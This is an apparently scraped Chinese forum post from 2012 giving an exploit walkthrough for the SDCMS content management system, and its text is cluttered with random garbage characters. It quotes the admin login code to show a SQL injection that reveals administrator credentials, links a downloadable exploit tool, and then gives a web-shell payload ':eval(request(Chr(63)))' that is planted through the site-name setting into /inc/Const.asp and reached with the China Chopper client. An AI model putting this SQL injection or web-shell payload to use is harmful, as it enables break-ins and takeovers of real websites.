作者:T00LS 鬼哥1 e! g" l# S n8 e4 l; f: K% E
漏洞文件:后台目录/index.asp
' _, h" B! |7 q/ I- j5 |
; h3 j. P( E% g) O& g1 JSub Check
) g4 X: Z2 ?0 `8 j# S% n/ w9 b/ T Dim username,password,code,getcode,Rs
7 P! v) R3 | Z6 x; U IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub! \$ j5 e( R- V- f+ ?& c% C6 B7 W! a( L
username=FilterText(Trim(Request.Form("username")),1) |* E* w5 v0 K$ t/ @: ]' n( t% R
password=FilterText(Trim(Request.Form("password")),1)
0 u' Z* i5 D! H+ A$ A* Y code=Trim(Request.Form("yzm"))' N2 d5 f% Z1 o: k8 O) [+ a
getcode=Session("SDCMSCode")0 d% ` S: q# w% E/ K7 \
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died7 j; m! o8 s& N! W2 o8 L$ e
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
- [" p3 ~" \8 s. j IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
# h n5 H; k# q2 |, j2 Y& v IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied1 }' L1 Q8 l) I
IF username="" or password="" Then
7 M o6 J+ K+ Q& t; f Echo "用户名或密码不能为空"ied3 B9 `+ a. O2 \+ m8 T- O0 J& L
Else
! ?1 e6 }8 h, }+ x4 K Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")! S9 j, K+ E2 M
IF Rs.Eof Then4 k2 v4 o1 z9 e& ?
AddLog username,GetIp,"登录失败",1
, |3 W+ E/ W- J% x! Z0 @$ ~3 z Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
1 v3 M" j: ?4 X7 Z6 n Else/ A6 y0 J) S$ D# E; J
Add_Cookies "sdcms_id",Rs(0)& n. S Z0 s3 K& Z1 i) E4 k
Add_Cookies "sdcms_name",username
6 H. l# A% F3 v Add_Cookies "sdcms_pwd",Rs(2)& H; d% N/ [; S0 |' m- I( M
Add_Cookies "sdcms_admin",Rs(3)
1 }% M( o7 T3 }8 v2 [/ Y) h* X' T Add_Cookies "sdcms_alllever",Rs(4)
# @5 y8 Q% C2 i7 |( L0 M& ?7 a Add_Cookies "sdcms_infolever",Rs(5)
8 J2 {$ i8 F! S( w; ]" H. Q Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
, i* S% w* y! f5 a AddLog username,GetIp,"登录成功",1( u7 j2 m( a( Q
'自动删除30天前的Log记录* F; `+ O5 w. u- f0 B
IF Sdcms_DataType Then3 u7 U! M+ R- h# Z$ a
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
" V' o! u5 C3 ?- W$ g1 p+ h* z Else! Q1 l2 H% w. Z0 B
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")8 `0 A1 x! q2 b3 @5 [0 b: i q
End IF
& {1 i) K8 O# a/ b2 Z, V Go("sdcms_index.asp")! A; i3 [6 ^; I r. s, W
End IF
- _, N0 U; v, F. I4 D6 X$ _/ Q Rs.Close
' z" r, j3 w i/ S3 @ Set Rs=Nothing/ W: ~' ^( L1 F( T
End IF
9 G, S# n2 y6 p7 c: gEnd Sub! _8 g% c5 _* @8 L% h+ S. w
& r c/ x# n* [& v" B- |/ S. D
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
- V) o& u9 l- G) U8 @! J! v5 @, T/ o9 N3 Y$ x& G/ q7 p0 r
Function FilterText(ByVal t0,ByVal t1)
. g5 U% T( j R, o: J I IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
_" l8 t4 i# E) b \% c# t9 \% K* Z9 A t0=Trim(t0)
+ d/ c. o3 [- W# g+ w Select Case t1
7 F" G3 N1 f/ J; s* Z n Case "1"
$ k5 [+ G. t2 B( a9 ^9 Y t0=Replace(t0,Chr(32),"")
( k/ x t5 d+ E r t0=Replace(t0,Chr(13),"")
" R3 }8 g3 v! |* c) ~$ p1 _8 M t0=Replace(t0,Chr(10)&Chr(10),"")
$ M/ a$ M' J: t t0=Replace(t0,Chr(10),"")
. P: p, w# X5 y. p Case "2"
5 j5 ~( G" J9 D6 _ t0=Replace(t0,Chr(8),"")'回格& c( Y. ]) w" l5 B5 k0 d8 `
t0=Replace(t0,Chr(9),"")'tab(水平制表符)( H F, c% e. R+ |8 A+ g5 _
t0=Replace(t0,Chr(10),"")'换行6 G+ G& O6 S- P; S
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)) i2 k+ I7 C7 `1 z! I: y$ `9 W
t0=Replace(t0,Chr(12),"")'换页6 e8 k" G, t/ O8 J7 |! S& C# O
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
4 A5 e4 v. ^0 i: n. V: ? t0=Replace(t0,Chr(22),"")0 E, o+ p) z, M7 M' z: @
t0=Replace(t0,Chr(32),"")'空格 SPACE
3 s8 N$ v+ C/ T& z' L, n t0=Replace(t0,Chr(33),"")'!
8 M) Y1 [( G# R4 a, x3 \2 L4 J; ] t0=Replace(t0,Chr(34),"")'"( q8 ~- Q6 S; z& G
t0=Replace(t0,Chr(35),"")'#$ N' a1 G" u* E. ]1 v+ ~% s; l
t0=Replace(t0,Chr(36),"")'$
; `" M" O( i3 L, I0 W6 D+ \5 X t0=Replace(t0,Chr(37),"")'%
2 E: j+ c% ^0 n, M t0=Replace(t0,Chr(38),"")'&0 O! @$ H4 I( ^0 `. L5 T- R
t0=Replace(t0,Chr(39),"")''
( z6 s l- z2 K* I t0=Replace(t0,Chr(40),"")'(
% x. c( z6 _ v z8 \7 R: y t0=Replace(t0,Chr(41),"")')
- P( i% x8 w8 F3 X& s" d8 @: w# Z8 p1 g t0=Replace(t0,Chr(42),"")'*
+ U& E* a4 L3 C3 O t0=Replace(t0,Chr(43),"")'+
( K q4 `! C% l8 T) N t0=Replace(t0,Chr(44),"")',6 `" Z" \7 L L
t0=Replace(t0,Chr(45),"")'-
0 e% D( O4 e4 n1 L# e t0=Replace(t0,Chr(46),"")'.* M3 @) m( e5 \& s6 D8 I
t0=Replace(t0,Chr(47),"")'/
T. R3 b; \) f- c/ x+ A t0=Replace(t0,Chr(58),"")': @& N4 H8 @# X2 f& s1 X7 R; m
t0=Replace(t0,Chr(59),"")';
0 m% s* q# A6 A3 l4 I$ y t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>4 m+ d0 `3 g0 C+ d$ o
t0=Replace(t0,Chr(63),"")'?$ b* C5 z( Z% G+ Y
t0=Replace(t0,Chr(64),"")'@
( R8 h6 |/ M) u2 t( p, l t0=Replace(t0,Chr(91),"")'\
. `% S: H9 D# g) Y. `" G6 i [: g t0=Replace(t0,Chr(92),"")'\
2 ]6 ~1 l( O; \ t0=Replace(t0,Chr(93),"")']
3 g u9 _. `" J: F t0=Replace(t0,Chr(94),"")'^
0 L2 ?' H* {2 c# c8 p t0=Replace(t0,Chr(95),"")'_
* @4 g" v% }" `) w t0=Replace(t0,Chr(96),"")'`' _0 h* P3 X1 B; ~- b7 ?! J
t0=Replace(t0,Chr(123),"")'{& T' _2 [$ @( N0 G- p; u
t0=Replace(t0,Chr(124),"")'|
+ @' }, S r8 D; N. w) `2 @ t0=Replace(t0,Chr(125),"")'}$ T. d# F) y: f3 X; O" _0 c
t0=Replace(t0,Chr(126),"")'~ L. |( L1 }% D% B: f& J" r
Case Else; a3 B1 T% |# Z% a# X
t0=Replace(t0, "&", "&")/ {# {# O. m1 D8 n
t0=Replace(t0, "'", "'")
3 @6 M) B7 [$ A7 s9 K t0=Replace(t0, """", """)- A) l$ T( \4 _
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")& i; p; ?3 X$ l/ k
End Select
5 w0 r9 X! ~" W5 G IF Instr(Lcase(t0),"expression")>0 Then& W3 R6 h: [: D( K# T
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)5 X3 H ?3 b! l9 W/ z( ?8 T
End If+ C- {% x# q7 Q* Z0 q: [( P
FilterText=t0" G9 ?4 C8 B0 D1 C- X
End Function1 Y6 d5 M/ d2 N9 g% |
. Y! g0 e0 `; I# T8 n5 T0 N. }
看到没。直接参数是1 只过滤
+ A: w0 ]" K! ] t0=Replace(t0,Chr(32)," "); f& N6 g2 o* W
t0=Replace(t0,Chr(13),"")
$ j! C% N. x9 r0 c% F, c t0=Replace(t0,Chr(10)&Chr(10),"* m5 J6 a1 r5 U( }) G6 h7 _
")
* ^( H( p1 E' z4 y t0=Replace(t0,Chr(10),"+ f! r. g: w- D; V6 q
") m& N: o8 q6 O) |, F: K( b
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
( C7 H/ I) R( X+ Z$ l3 BEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
/ P7 G1 [3 T) D8 ]& j6 U- E3 }: [" U* Y# O8 M p
测试:
/ H; ~! A& ?, Q" r% W2 ]0 ?' q
; b# v( E1 S2 u# `
0 [" @ F. b W/ `现在输入工具上验证码,然后点OK
& V, f% N9 y# B9 s' n& c7 ~ f
9 D2 E* }/ }) d6 _( T4 Y' j: r! ], g, \5 [3 v
看到我们直接进入后台管理界面了,呵呵!) C7 Z! d, @! M2 l4 ~ \( h1 Z
- T4 `! z( E3 B' X$ N1 } s
6 M/ n4 |8 H8 X4 |; {
8 k# p+ |$ ~5 w/ H1 L' g6 Z2 D
这样直接进入后台了。。。。
) j- u% U0 w; }$ B) R* a- S/ Z- S. x7 v2 K T! a( k& N
6 T" x: W: l0 {6 y. e2 O
. _6 w- q) E6 `
SDCMS提权:
9 h# S" ^. F) H& p: b/ l1 k( S# T# o# g) {
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?9 k$ `8 M% |0 u3 _
2 x9 a& v5 J8 a! P5 V$ _
) r/ p) b2 ~( r) O3 e& k+ T2 _# ~ h9 ~; W, B( i1 I( ^$ B; d
OK,现在用菜刀连接下!! s" U4 u) N9 n+ z W, _. n
8 Y- R" m2 d: }6 S, Z5 a( m- e7 h3 `* x! K
/ `% } O) V+ x
' g1 g& T. N. K% t$ ?2 A3 L* m
/ y, @6 z B _1 Y+ A/ S |
发表于 2012-11-9 20:57:02
收藏
支持
反对